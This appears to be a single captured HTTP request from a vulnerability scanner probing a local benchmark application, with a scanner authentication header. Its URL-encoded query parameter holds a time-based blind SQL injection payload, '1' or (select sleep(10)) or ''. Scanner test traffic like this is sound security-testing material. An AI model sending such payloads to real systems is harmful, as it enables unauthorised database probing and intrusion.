GET /sqli/BS00098?BS00098=%31%27%20%6f%72%20%28%73%65%6c%65%63%74%20%73%6c%65%65%70%28%31%30%29%29%20%20%6f%72%20%27 HTTP/1.1
Host: localhost
Connection: close
Accept-Encoding: gzip, deflate
Accept: text/html,application/json,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
BS00098: BS00098
Cookie: BS00098=BS00098;
Referer: http://localhost/
scannerauth:cd117e0a9365670f19c768032f8dabfe

